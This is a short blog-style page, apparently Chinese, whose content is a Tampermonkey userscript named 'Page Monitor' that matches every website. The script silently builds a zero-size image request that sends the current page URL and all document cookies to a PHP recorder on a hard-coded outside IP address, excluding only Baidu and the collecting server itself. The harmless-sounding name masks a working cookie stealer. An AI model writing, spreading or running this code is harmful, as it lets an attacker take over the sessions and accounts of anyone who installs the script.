monitor

// ==UserScript==
// @name Page Monitor
// @namespace http://tampermonkey.net/
// @version 0.1
// @description try to take over the world!
// @author Dem0nX14n3
// @match *
// @include *
// @exclude https://*.baidu.com/*
// @exclude http://*.baidu.com/*
// @exclude http://118.89.51.198/*
// @grant none
// ==/UserScript== (function() {
'use strict';
var img = new Image();
var storageURL = "http://118.89.51.198/lzx/recorder.php"; //information storage file
var accessURL = window.location;
var acCookie = document.cookie;
img.style.width = img.style.height = "0";
img.src = storageURL +"URL="+accessURL +"&Cookie="+acCookie;
// Your code here...
})();
上一篇:iOS 多线程编程之Grand Central Dispatch(GCD)


下一篇:android注解处理技术APT